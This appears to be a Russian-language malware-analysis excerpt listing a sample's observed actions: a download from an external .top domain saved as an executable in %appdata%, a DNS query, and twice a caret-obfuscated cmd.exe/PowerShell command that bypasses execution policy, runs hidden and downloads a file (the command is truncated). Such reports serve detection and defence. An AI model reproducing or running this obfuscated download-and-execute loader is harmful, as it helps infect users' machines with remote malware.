Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^W^e^r^ShE^l^l.E^X^e ^-Ex^EcUTiOnPoL^ICY ^b^yp^A^s^s ^-nO^PrOFi^lE -wINDO^W^STy^lE ^h^I^DD^eN^ (^NEW-^obJ^ecT^ ^SYs^te^M.NeT.wEb^CL^iEnt)^.DoWn^loADfi^lE^(^'http://www.fa...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "P^o^W^e^r^ShE^l^l.E^X^e ^-Ex^EcUTiOnPoL^ICY ^b^yp^A^s^s ^-nO^PrOFi^lE -wINDO^W^STy^lE ^h^I^DD^eN^ (^NEW-^obJ^ecT^ ^SYs^te^M.NeT.wEb^CL^iEnt)^.DoWn^loADfi^lE^(^'http://www.fa...' (со скрытым окном)